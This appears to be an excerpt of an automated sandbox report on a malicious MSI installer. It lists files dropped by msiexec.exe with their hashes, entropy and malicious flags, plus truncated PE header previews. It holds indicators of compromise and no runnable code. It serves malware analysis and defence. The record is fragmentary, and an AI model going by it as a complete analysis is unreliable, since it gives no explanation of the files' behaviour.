                                                  SSDEEP:768:S/R/jO3pGVwBF20lNBVfwXIpNzBToHSfbu4SAvUN/pzSUx67//yFF:MRrO3KqBeKWSn7WF
                                                  MD5:4B066D38DBCF6B34DAC79FDF1D8B61A2
                                                  SHA1:83F441ABC5E495FD1086008DE529640F2C21F346
                                                  SHA-256:3A76ECE7B42A78424B5E9866BB2820AF870622B8F9B5CD84711029126673BC08
                                                  SHA-512:9099B67AE5A0CFE2235C440DFF4A72FC5D527374A8E558B00F2EA935401838073A4F9F7D6C7C6A5DE8C899993F35C3C8881E2C263A20332D036A3493B307730E
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):90014
                                                  Entropy (8bit):7.998209516743823
                                                  Encrypted:true
                                                  SSDEEP:1536:qf6fRCL8yUFSwdbx/xsgwonwHSAnZEbn7T73l/hXASqURe4iJbA+7zx:zfMLfiSwv5wonOSASn7TTl5wKe4Izx
                                                  MD5:35C1E7A53DD23C00ACCE2DA7FBB754D3
                                                  SHA1:159A471D00F72014352CF1F40FECEBDEB1FAA5EB
                                                  SHA-256:73F0DA73F1712849AA9878FE0C6442121350BA928632D7C20D99548740D58A55
                                                  SHA-512:417C1F00399363F653B3B011317FDDB7BAD5238899EFB404699344B4AF484AA0F97F6BE2117CFE3ECC2BE2ADDD9DBF16837CA6D541D57653AE0AB10AF1991075
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32520
                                                  Entropy (8bit):7.993661924408125
                                                  Encrypted:true
                                                  SSDEEP:768:FWmEF2vB3mkeGVFdd/s2WKI30gWG1hAbbbo4B2rTi2dwEVhVJ:22vB3mkeGVfFdTi0gSHog2S2eEbVJ
                                                  MD5:DE65F5463326EEE43A9AB108DED94C53
                                                  SHA1:F7BBE75610DC317D897040AC5DB4041B3C16BF36
                                                  SHA-256:35BC57819FAD6E61CD0819EE5EEDB827251D83FEB23E809D2CD746A36C5ECEF7
                                                  SHA-512:EDA61A322A4AEAB9138DE8FEF4BCA8E5ED5EAADF5C50573E05E15BE94EBA72179D225D4DC7606F6A8055C9942F05A8E1013B3F009C813DCAD33F5DC405895DFE
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):100966
                                                  Entropy (8bit):7.998412085921912
                                                  Encrypted:true
                                                  SSDEEP:3072:lG5ZPA2Ei0Glgejn7T8TCuIO5p6H6+cRJXEo+RMdxBJ:UZPd10GfneCXO5YcX00d
                                                  MD5:F55E7B7AF6071C10547C54D62204B475
                                                  SHA1:E036BEF92DFF196F6423F7B0C094F634DCC0DEF7
                                                  SHA-256:B862442376861EDA141DF226A952D35FB5E82AB127AD090C81EC46FF8CE33A0C
                                                  SHA-512:544492FBC7B42B400C664B27033F3EF212C261290B857408258BDBB3C3DF6D0C01D8585D4D2BE6133E15B90096230EF289164BF025B1FE0B5A66452FAA28F4EF
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37116
                                                  Entropy (8bit):7.994747677689325
                                                  Encrypted:true
                                                  SSDEEP:768:6yYUIATW3mYRfDNRFxvBqmTu9oUADyPH612ojJx2z94XSJj4:ZMvRPBqmqdlovb44XSJ4
                                                  MD5:541703A97409F03643B2F8AE7A534509
                                                  SHA1:BF5A64870DC5C3DFDC2209321BC1E5C62C21FFA8
                                                  SHA-256:0F18A5ADD9085FDBF60909A8CCA9DBE79F143AF2551926D7492192A7501B40DB
                                                  SHA-512:600BD2FEC8FA91CD5D86B1E51A7267D72EDD4DA8A2A2EF32E867319FAF45E3F479A2EBB4D5908DB59901877227EBCA5EDF7F60536966D0989F971898A2F7AF2C
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2252904
                                                  Entropy (8bit):6.790821016155236
                                                  Encrypted:false
                                                  SSDEEP:49152:tX1r/EHlIN8LAEIenc6tn8F3KhSX2sJSPLvScP+B:tXh8Hlm8LAELc6pw3KhSX2sgPLg
                                                  MD5:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  SHA1:34DCE3F5EC37472A79CEA43959C319CF67E22D35
                                                  SHA-256:07D849EAF8BBBCE5ABD7EC2348DFF0394F49E803C34120629AE258E62A1A32BD
                                                  SHA-512:F8CD93CC9888A95CA47852D7B6725213C0E0B905A66E19AC41428E83A0ADE17803EAA77F3C5C7719B733E745A09D669B89554647017D4414D34ED626C69B52E5
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....o.f.........."..........(....................@...........................#.....U."...@.........................N..........d....p...C...........8".h(....".....|v.......................u....... .....................<........................text...J........................... ..`.rdata....... ......................@..@.data....E.......8..................@....tls....]....@......................@...CPADinfo(....P......................@...malloc_h;....`...................... ..`.rsrc....C...p...D..................@..@.reloc........"......R!.............@..B........................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):734375
                                                  Entropy (8bit):7.96368320948898
                                                  Encrypted:false
                                                  SSDEEP:12288:8I3H1fJod/zgsz5B0GDJQrnKs8SNP+QSsSilxNwt0D+cImfd8xEqoO0TehEr2:b3VB4zEEmPLSUNwt0KcV6xEqoO0TO5
                                                  MD5:D7E5189AFFC7F032A6A2D5E4213395C8
                                                  SHA1:DD9A1D0DAD42162953E30D6351A427D6D8665918
                                                  SHA-256:652A51FF9C655862A5C5A876BE3252757D12543ADCE27EAF76C0287C976D2B30
                                                  SHA-512:7EB21092941DBA3CCD1AF9B8B9D884943FDA9DB253FC537A03E297C39E1FE7F98459A0CFCBB25D9C5B7873D2FC42221D038AB2ADA5D687690552A13686024D09
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):8739328
                                                  Entropy (8bit):7.900176092544119
                                                  Encrypted:false
                                                  SSDEEP:196608:auPCTUTkzRnAPpHk+YcvRnErpyrk6bJu7wbgkyO4RJ6hmkvp9oY:5RTaRgpE+dCVaVu7HGxX
                                                  MD5:059924B5F0C3B80280BFAF36D5E74D81
                                                  SHA1:3CE7BFACFF997DEAB7FB47696AF84BF6B2C33C99
                                                  SHA-256:FA31D1981E5C17D8F61EB95B70A1B123A7873A555BF55B26337A8193089590CB
                                                  SHA-512:7F7D03E8096BC2D5FBDF44060A68C7CD5B7383BD702FDACDDF0DF3780A06C9BE8A8C8355EF0FA1C7759525F1F6B45AB9FDE412A19239EAAF376E996E6BF2B80F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L.....f...........!.....j....F......Z............@..........................P............@.....................................d........E...................@..$....................................................................................text....Z.......................... ..`.itext.......p...................... ..`.data....h..........................@....bss....h~...............................idata.......p......................@....didata.............................@....edata..............................@..@.rdata..E...........................@..@.O%......|..........................@..@.9Xc.....F...0......................@..@.debug....D.........................@..@.CE3.....I:..@Y..................... ..`.l`q................................@....p}\.....@.......B.................. ..`.rsrc....E...........J..............@..@.reloc..$....@.......R..
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:MS Windows cursor resource - 1 icon, 32x32, hotspot @0x0
                                                  Category:dropped
                                                  Size (bytes):326
                                                  Entropy (8bit):1.2807478913655284
                                                  Encrypted:false
                                                  SSDEEP:3:GlFFXlGFllfl/t+lklel/e/hRD:Gl/Nls62bD
                                                  MD5:DBD44C4AC444D2E0448EC0AD24EC0698
                                                  SHA1:371D786818F0A4242D2FCED0C83412CAA6C17A28
                                                  SHA-256:BF79BFFDBA70F456CB406FD1ECE8652750363B94188510B5D73F36C8EA6E7AE9
                                                  SHA-512:E8025CEB6ECB76B480F279D7E42DEEC8B96C0C1D64CFA3B7AF1E68320281F0F2A9B886AFC16AADE4E2178878970C4909FD650C1DC3C37594D040141ED0AB113F
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):48
                                                  Entropy (8bit):4.871115365169273
                                                  Encrypted:false
                                                  SSDEEP:3:fAz7JQfmSzgPpwqn:ycZqn
                                                  MD5:3553F3FEA80E7491631764D81E8DA0E1
                                                  SHA1:4EDB7CE66A17CC20E158E4283F2523F6E5E67854
                                                  SHA-256:7B37C3D6DBB8E564A62D71A6D89A600C25B5671D6DF43EB06FC990606D0144BF
                                                  SHA-512:E83850FD803A3252A868EA3552E079E9D95FFD1B8AF12790407FF88FB55D52E99FB0C6805EBB6D75EAFF61112C60EEF64325DC5B5244F4E5BB8CBC6A10FF4CCA
                                                  Malicious:false
                                                  Preview:A3HTFP/TX+mV9j5Fh8HL0WGszC3vw3RnVcmEj1bAzhVyw0Rj
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:modified
                                                  Size (bytes):957728
                                                  Entropy (8bit):6.61749314970573
                                                  Encrypted:false
                                                  SSDEEP:24576:Chn0GjuAhKHBEwjUrHyu6Z5W1DYsHq6g3P0zAk74fJQf:ChdMHBEqkHj6Z5W1DYsHq6g3P0zAk7I
                                                  MD5:CFA38CC9320331B3D7A52A58A6AE4577
                                                  SHA1:9BAEDFB077FA677ACE979B46F597DAB16038D684
                                                  SHA-256:F3FA8B4F48697F87D34E8CA0262977FE0A8AE3EB04242E9143B3886E754918A0
                                                  SHA-512:BA2D9AA803C039F323868CDCEC9B532BBC67A7DD87D4156CF732A5CEAEEC3F804B390B1A03362A314147D7BC339D3B4D50C89673288855CAECD6CF78C13C1513
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...h.0f.........." ................................................................;.....`A............................................<!...&..P................q...t.. )......(.......8.......................(.......@............+...............................text...[........................... ..`.rdata..............................@..@.data....L......."..................@....pdata...q.......r..................@..@.gxfg...P).......*...2..............@..@.retplne.............\...................tls.................^..............@..._RDATA...............`..............@..@.rsrc................b..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F8A879B8-DD71-4150-8A82-B310C0805644}, Number of Words: 10, Subject: Windows Installer, Author: Microsoft Windows, Name of Creating Application: Windows Installer, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Windows Installer., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Aug 22 16:17:57 2024, Number of Pages: 200
                                                  Category:dropped
                                                  Size (bytes):27090432
                                                  Entropy (8bit):7.983012684293603
                                                  Encrypted:false
                                                  SSDEEP:786432:+mWauXOZ+iiOixYW1tdMzzL+B+8io6I72Mz96bakT:+mcXOZIYitdMrkioYs0a
                                                  MD5:BFAB767AF344FA22CFADFD11144AB5FE
                                                  SHA1:8C2BC0FD1FABF0410E5122C2B5929C34F306545A
                                                  SHA-256:5F75B66B8BB89295FF96BB25DC3D37C6B6F93EBC9507EF1C16FF5DC8CDDBEEF7
                                                  SHA-512:E4D80F08C093E364075E1DCF04C9F83A66DD33A5035CEC06D7C2B4DC50EA438A5B3155A3FC5E95DE40B2129EF84694143A9148F9075821DF569BCFA2D0B53892
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):602432
                                                  Entropy (8bit):6.469389454249605
                                                  Encrypted:false
                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):602432
                                                  Entropy (8bit):6.469389454249605
                                                  Encrypted:false
                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):602432
                                                  Entropy (8bit):6.469389454249605
                                                  Encrypted:false
                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2426
                                                  Entropy (8bit):5.471082223598668
                                                  Encrypted:false
                                                  SSDEEP:48:CkaB0a6xA4AR0IuRr7YQ6O9MiB+fuRZYQ43r/8485i7AX6CRXfuRFs:Ck20txAvGhuhO8mwDh887i6CgE
                                                  MD5:AF1E44EF28188AC153CF4948184EDFD9
                                                  SHA1:B12D8C8D1D1F947D0E9E9CD966DA749CDACA4862
                                                  SHA-256:ED76205960F5FBD1E6F4558C311A6164E7033C892D916573F91E601EDE4F71C9
                                                  SHA-512:81E5167FD5AFFD207BAF14883685B4EF1D1137F800ECEDF011E178D411BF07B73368A454B23751176499CF5E8D89704B3A12330C1DC76C43A9F32F88DBD45942
                                                  Malicious:false
                                                  Preview:...@IXOS.@.....@.j.Y.@.....@.....@.....@.....@.....@......&.{1F409DE5-F41D-4B97-A3CD-EF30B43C9B23}..Windows Installer..nf963-5d-qns6-w812.msi.@.....@.....@.....@........&.{F8A879B8-DD71-4150-8A82-B310C0805644}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Installer......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{D608D6C6-E1D1-48EF-AE39-6038652DD840}8.01:\Software\Microsoft Windows\Windows Installer\Version.@.......@.....@.....@......&.{66973ED1-FE65-4BFA-9786-51A78A35D3C5}C.C:\Users\user\AppData\Roaming\Microsoft Windows\Windows Installer\.@.......@.....@.....@......&.{FC8D85E8-F55F-451C-A3A0-6E94DB1764F9}n.C:\Users\user\Documents\AppUp.IntelGraphicsExperience_1.100.5536.0_neutral_split.language-pt_8j3eq9eme6cttds\.@.......@.....@.....@......&.{A68D8AF3-C457-47CD-866F-170D19AD8D61};.C:\Users\user\A
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.1686573030376701
                                                  Encrypted:false
                                                  SSDEEP:12:JSbX72FjeiAGiLIlHVRpRh/7777777777777777777777777vDHFYeBn8+l0i8Q:JrQI5FieAF
                                                  MD5:D3DFDE85A9110AA11B89F1E92B1D9435
                                                  SHA1:A92CD0102235FCDFFC7068B6640270EE1A94FA83
                                                  SHA-256:060D53DD6AC247488C49C3822697A814A5846B113B48E8E88EF68C5B47FEF801
                                                  SHA-512:689F034390466AE585141E1CE9E77FC46EBE9E3D010532A064AA27E2DC1F11F336EEED70B6907C286D229D104C9A67C2ED64D69CB612F8AFF362FBC4A63F0D00
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.5681224826136102
                                                  Encrypted:false
                                                  SSDEEP:48:JO8PhuuRc06WXJEnT567IAy3SCyZAECiCy3Wo5y3SCyNT4:JBhu1HnTuIB3ECt
                                                  MD5:C641A52DB3324891E9DF9F6248F0E32B
                                                  SHA1:1F1DD470474333021B9318328DF9DCBE106035C7
                                                  SHA-256:0D8D185D9A34EE89A85F2666D6767938F7A6F78B3CD5B827447B6610C5EAD88B
                                                  SHA-512:33ECA3F4F3E11410D9578DD6D7C944524AC2FD5165D7013C73309030813A060B47F20E014D2A99C489A8B7291C7AB7FDE13F8A4C32C7D2FAF61B05AE83C43389
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):432221
                                                  Entropy (8bit):5.37516660764235
                                                  Encrypted:false
                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaux:zTtbmkExhMJCIpEr8
                                                  MD5:4D49B3C349A8F394F917610A1CADBCE4
                                                  SHA1:D2EAD473AB82345C82AF3BC9E0EE1ACD58A02270
                                                  SHA-256:F554C46303E4503CAAA58F3A9E728D332A8803ECC3F9828D5D4CF28AD7F6FB05
                                                  SHA-512:D3DEC9C8AFA85F9EF6AA410E355C2FA60EAC9F485A9ED66F681D6EE7E90D9793BB6FBF94464EAB3042113ECA34B95AA4D2C69884C4FD19922BE188D8FBB7F270
                                                  Malicious:false
                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):0.0752481518570756
                                                  Encrypted:false
                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO4pVO+TeBtxAU0AVky6l+:2F0i8n0itFzDHFYeBn8+
                                                  MD5:1C538997B085FA709DABF8E34ADD920E
                                                  SHA1:89C734F1C3EEDDF0980EF44D1C03F47D99C91656
                                                  SHA-256:74384F96AF95C108B14E0CB7ED063BA06CE615F0DEFC97C0F28A0D7D70B8516B
                                                  SHA-512:29E6DC35F34D98A4A44163CCF22CD49F7F2636D74310225A8E47677DEA78A09395A3232A8D3DAA08FB5EB45160D9829C7C47DA33973931BD7E5EFBDC745E747C
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.5681224826136102
                                                  Encrypted:false
                                                  SSDEEP:48:JO8PhuuRc06WXJEnT567IAy3SCyZAECiCy3Wo5y3SCyNT4:JBhu1HnTuIB3ECt
                                                  MD5:C641A52DB3324891E9DF9F6248F0E32B
                                                  SHA1:1F1DD470474333021B9318328DF9DCBE106035C7
                                                  SHA-256:0D8D185D9A34EE89A85F2666D6767938F7A6F78B3CD5B827447B6610C5EAD88B
                                                  SHA-512:33ECA3F4F3E11410D9578DD6D7C944524AC2FD5165D7013C73309030813A060B47F20E014D2A99C489A8B7291C7AB7FDE13F8A4C32C7D2FAF61B05AE83C43389
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):73728
                                                  Entropy (8bit):0.1390313120237905
                                                  Encrypted:false
                                                  SSDEEP:24:oSpTxkrOqS3ipVkrOqSJkrOqS3ipVkrOqSZAEVkryjCyqSWV2BwGVea+yK7y:xpTey3SCyWy3SCyZAECiCy3WoLG7
                                                  MD5:09352A99CA37C3537F2CD5FC6D3BCFFC
                                                  SHA1:EDDAA5753FE2E1360F0FCCF0BD974A111FAA5C78
                                                  SHA-256:9729445A2F39B699321B5EA7BEB0F75BF162E66CB461E9C8F88BBCF0539E352A
                                                  SHA-512:55DB6F27CA6242FCC7E792AC3F5DCBA1098FC15E37526CBC92ECA95D3FD8F0E7CC2D469605A72A6AE76DC5E9CA2058C71E473A755D442429D6D7AEB2BA28644F
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):1.2565562326967106
                                                  Encrypted:false
                                                  SSDEEP:48:lHmudM+CFXJbT5a7IAy3SCyZAECiCy3Wo5y3SCyNT4:ZmDDTOIB3ECt
                                                  MD5:EC8130135EEF93499B60C141466F9490
                                                  SHA1:FAD3877B6A73CE8842016558687E1CD5C2E11DD9
                                                  SHA-256:3E56FEEDE86671A148F2C15CAA7D31691742599845D6651FE6CA30C8CA2F357F
                                                  SHA-512:FB3E37FB2A41E9AAB54BFA5AF3968E435B349E3FD033D30760093FB5608F029CB6442FB0BDD3C2C9F16E1C8FF7B5084A1077DEC206624E3F988F79C44444DF7C
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):1.2565562326967106
                                                  Encrypted:false
                                                  SSDEEP:48:lHmudM+CFXJbT5a7IAy3SCyZAECiCy3Wo5y3SCyNT4:ZmDDTOIB3ECt
                                                  MD5:EC8130135EEF93499B60C141466F9490
                                                  SHA1:FAD3877B6A73CE8842016558687E1CD5C2E11DD9
                                                  SHA-256:3E56FEEDE86671A148F2C15CAA7D31691742599845D6651FE6CA30C8CA2F357F
                                                  SHA-512:FB3E37FB2A41E9AAB54BFA5AF3968E435B349E3FD033D30760093FB5608F029CB6442FB0BDD3C2C9F16E1C8FF7B5084A1077DEC206624E3F988F79C44444DF7C
                                                  Malicious:false
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.5681224826136102
                                                  Encrypted:false
                                                  SSDEEP:48:JO8PhuuRc06WXJEnT567IAy3SCyZAECiCy3Wo5y3SCyNT4:JBhu1HnTuIB3ECt
                                                  MD5:C641A52DB3324891E9DF9F6248F0E32B
                                                  SHA1:1F1DD470474333021B9318328DF9DCBE106035C7
                                                  SHA-256:0D8D185D9A34EE89A85F2666D6767938F7A6F78B3CD5B827447B6610C5EAD88B
                                                  SHA-512:33ECA3F4F3E11410D9578DD6D7C944524AC2FD5165D7013C73309030813A060B47F20E014D2A99C489A8B7291C7AB7FDE13F8A4C32C7D2FAF61B05AE83C43389
                                                  Malicious:false
